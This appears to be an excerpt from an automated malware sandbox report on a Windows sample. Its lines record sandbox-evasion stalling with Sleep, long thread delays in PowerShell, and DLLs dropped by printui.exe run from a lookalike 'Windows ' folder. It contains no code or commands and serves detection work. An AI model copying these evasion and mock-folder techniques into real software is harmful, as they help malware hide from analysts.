    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Found stalling execution ending in API Sleep call
    Source: C:\Windows\System32\console_zero.exeStalling execution: Execution stalls by calling Sleep
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5380Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4376Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5602Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4141Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7456
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2053
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5071
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5377
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3239
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6637
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4615
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4928
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4265
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1291
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3299
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8235
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 957
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6512
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3050
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6840
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2704
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8006
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1502
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6857
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2729
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6803
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2850
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7811
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1679
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2682
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6980
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6495
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2933
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7185
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2342
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6720
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2876
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7493
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2058
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6758
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2823
    Source: C:\Windows\System32\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
    Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\ucrtbased.dllJump to dropped file
    Source: C:\Users\user\Desktop\curlapp64.exeDropped PE file which has not been started: C:\Users\user\Desktop\prnttemp.dllJump to dropped file
    Source: C:\Users\user\Desktop\curlapp64.exeAPI coverage: 6.4 %
    Source: C:\Windows\System32\svchost.exeAPI coverage: 1.1 %
    Source: C:\Windows\System32\console_zero.exeAPI coverage: 1.5 %
    Source: C:\Windows\System32\timeout.exe TID: 368Thread sleep count: 81 > 30Jump to behavior
    Source: C:\Windows\System32\timeout.exe TID: 6580Thread sleep count: 81 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7060Thread sleep count: 5380 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7060Thread sleep count: 4376 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3720Thread sleep time: -5534023222112862s >= -30000sJump to behavior
    Source: C:\Windows\System32\timeout.exe TID: 1888Thread sleep count: 66 > 30Jump to behavior
    Source: C:\Windows\System32\timeout.exe TID: 6392Thread sleep count: 69 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4276Thread sleep count: 5602 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4276Thread sleep count: 4141 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6420Thread sleep time: -4611686018427385s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exe TID: 4144Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820Thread sleep count: 7456 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820Thread sleep count: 2053 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3812Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\System32\console_zero.exe TID: 6324Thread sleep time: -46000s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200Thread sleep count: 5071 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2232Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep count: 311 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6420Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 516Thread sleep count: 5377 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5240Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1672Thread sleep count: 227 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5996Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2408Thread sleep count: 3239 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep time: -8301034833169293s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6532Thread sleep count: 104 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2684Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3128Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\console_zero.exe TID: 3948Thread sleep time: -46000s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep count: 6637 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3848Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840Thread sleep count: 345 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2616Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5432Thread sleep count: 4615 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2316Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep count: 4928 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5800Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5532Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1164Thread sleep count: 4265 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2584Thread sleep count: 1291 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3448Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3008Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5012Thread sleep count: 3299 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2884Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4112Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\timeout.exe TID: 6436Thread sleep count: 99 > 30
    Source: C:\Windows\System32\timeout.exe TID: 2576Thread sleep count: 117 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2296Thread sleep count: 8235 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4696Thread sleep time: -7378697629483816s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5768Thread sleep count: 957 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4288Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5320Thread sleep count: 6512 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1524Thread sleep count: 3050 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6352Thread sleep time: -6456360425798339s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6004Thread sleep count: 6840 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6004Thread sleep count: 2704 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5656Thread sleep count: 8006 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5656Thread sleep count: 1502 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6304Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2824Thread sleep count: 6857 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200Thread sleep count: 2729 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2968Thread sleep time: -6456360425798339s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4592Thread sleep count: 6803 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4592Thread sleep count: 2850 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep time: -6456360425798339s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1876Thread sleep count: 7811 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2636Thread sleep count: 1679 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6136Thread sleep time: -8301034833169293s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep count: 2682 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452Thread sleep count: 6980 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5268Thread sleep time: -9223372036854770s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3668Thread sleep count: 6495 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep count: 2933 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5736Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 748Thread sleep count: 7185 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep count: 2342 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3092Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3372Thread sleep count: 6720 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4808Thread sleep count: 2876 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3308Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep count: 7493 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180Thread sleep count: 2058 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3148Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7032Thread sleep count: 6758 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2812Thread sleep count: 2823 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep time: -7378697629483816s >= -30000s
    Source: C:\Windows\System32\timeout.exe TID: 6448Thread sleep count: 85 > 30
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
